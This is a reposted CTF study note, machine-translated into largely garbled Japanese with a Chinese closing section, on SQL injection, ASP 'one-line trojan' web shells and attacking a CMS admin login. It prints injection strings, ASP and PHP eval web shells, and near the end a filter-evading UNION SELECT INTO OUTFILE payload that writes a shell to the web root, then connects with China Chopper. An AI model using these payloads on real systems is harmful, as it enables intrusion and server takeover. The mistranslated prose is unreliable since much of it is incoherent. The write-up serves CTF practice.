CTFの研究レポート5

SQLインジェクション:

* SQLインジェクションは、入力パラメータにSQLコードを追加する方法サーバ解析に送信され、攻撃のいずれかを実行されています。

* SQLインジェクション攻撃フィルタリングされていない入力パラメータで、その後、直接SQL文の解析にそれらをステッチ、SQLインジェクション攻撃と呼ばれる予想実行、の手の届かない行為。

SQLインジェクション攻撃:

(1)デジタルインジェクション:

ブラウザのアドレスバーに:learn.me/sql/article.php ID = 1、この要求は、クエリを呼び出すのと同じです?:

$ SQL = "SELECT * FROM記事のid ="、$のID

通常の状況を返しますID =第1条、ブラウザ入力の場合:learn.me/sql/article.php ID = -1 OR 1 = 1?

これは、情報の記事を返すことがあり、SQLインジェクション攻撃です。

 

(2)噴射列:

ユーザログインのためのプラットフォームは、通常はありますが、あなたはへのログインに正しい口座番号とパスワードを入力する必要があります

SQLインジェクションは、パラメータデータが、それはMySQLでのコメントの文字列となり実施する方法であるように、ユーザー名とパスワードは、文字列であるため、

「#」と「 - 」:ユーザー=ユーザー入力した場合、ユーザー「#」とパスワード=「111」は#の後にコメントが無視されると見られている「#を、気軽に同等のユーザ名=であるパスワード111を入力してください」

「 - 」これは間違ったパスワードの一部に相当し、または直接再度ログインすることができますパスワードを入力しないように同じことが、コメント部分の後ろに見ることができます。

「OR 1 = 1#」我々は通常の使用には、この文が真であるので、ここで、1 = 1は常に設定されているので、条件に相当します。

弱いパスワード:パスワードは123などをクラックしやすいよう、それは単純なパスワードを指し、

トロイの木馬文:

<%要求(「値」を実行 )%>
あなたは、要求の前で、自分の価値観を変えることができるように値を取得するには、値が値である
<%evalの要求(「値」 )%>( 今より一般的な、しかし、以下のフォーム単語に文字が実用的な特別な制限がある)
は、データベースのURLを知っているとき、あなたはウェブシェルを取得するために、ローカルのWeb接続を使用することができます。(Doがちょうど<%evalの要求(「値」ことを知って、データベース缶を知らない )%> このファイルはどこに内部のASPファイルに挿入される。
環境のために:

1.サーバは、ゲストアカウントへの書き込みアクセスを持つ
2データベース・アドレスおよびデータベースフォーマットAspまたはASAとして知られている
単語は、ASPファイルに挿入することができる場合、データベース形式の場合には3は、AspまたはASAはありません。

オリジナルリンクします。https://blog.csdn.net/gl620321/article/details/89406176

 

CMSの脆弱性:

そのような練習を解決するためには、一般的に適用される環境のステップです

ツール(剣、Dシールド)によってスキャン1.背景

通常は/管理など/wp-login.php

管理者アカウントとパスワードを取得するには、着陸後に背景を探し2

SQLインジェクション、ブラスト弱いパスワードをお試しください

単語トロイの木馬のアップロードに着陸した後、再使用のリンクは、ルートディレクトリのチョッパーフラグを見つけるために3。

例: HTTP:URLを与え//219.153.49.228:44930

背景をスキャンしてみましょう剣

 

 

楽屋訪問を発見したWebサイトの管理者

 

 

 

その後、我々は、SQLインジェクションをテスト

図1は、本注射部位が表示され、口座番号「データベース操作が失敗入ります。

アカウント入力1'and'1「=」。1インジェクション文字、推測フィールドであり、その後、通常のログイン画面に戻ります。

账号输入1’order by 5#说明是#注释(ORDER BY句子用于对查询结果集进行排序,ORDER BY中每个表达式由列名或列序号(从1开始)组成。)

然后使用bp构造一句话语句

1' uni union on selselectect ‘<%php @eval($_POST[‘cmd’])?>’,2,3,4,5  in into outoutfilefile '/var/www/html/shell.php'#

将其16进制转化写进去,连接菜刀发现在根目录里

 

 

 

 

 

 

 

 

 

 

 

 

 

おすすめ

転載: www.cnblogs.com/wcwxb555/p/11968548.html